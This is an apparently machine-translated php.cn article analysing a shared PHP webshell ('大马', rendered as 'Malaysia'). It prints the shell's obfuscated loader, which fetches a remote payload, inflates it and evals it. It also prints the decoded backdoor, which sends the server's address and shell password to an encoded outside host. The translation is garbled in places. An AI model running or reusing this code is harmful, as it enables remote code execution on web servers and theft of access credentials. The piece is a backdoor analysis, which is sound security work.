What is php Malaysia

(*-*)浩
Release: 2023-02-25 22:16:01
Original
5506 people have browsed it

大马: refers to Trojan virus; php Dama is a program written in PHP to extract site permissions; because it has the function of elevating rights or modifying the site, it is called Trojan.

What is php Malaysia

#Someone shared a php Malaysia (said it was through waf), 80% of which has a backdoor, and I briefly analyzed it (Recommended learning: PHP video tutorial)

<?php
      $password=&#39;Shiqi&#39;;//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION[&#39;PhpCode&#39;])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION[&#39;PhpCode&#39;]=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(&#39;MTAx&#39;));
@eval($un($_SESSION[&#39;PhpCode&#39;]));
?>
Copy after login

There are three variables in total, $url, $get, $un. First, convert several variables ascii into strings. To see what it is, just use echo to output it.

What is php Malaysia

It is a simple encryption based on base64 plus gzinflate

Backdoor part:

if(isset($_GET[&#39;login&#39;])==&#39;geturl&#39;){

    @set_time_limit(10);

    $serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;];

    $serverp = envlpass;

    $copyurl = base64_decode(&#39;SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=&#39;);

    $url=$copyurl.$serveru.&#39;&pass=&#39;.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

function geturl(){

    @set_time_limit(10);

    $serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;];

    $serverp = envlpass;

    $copyurl = base64_decode(&#39;&#39;);

    $url=$copyurl.$serveru.&#39;&p=&#39;.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}
Copy after login

The above is the detailed content of What is php Malaysia. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
php
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template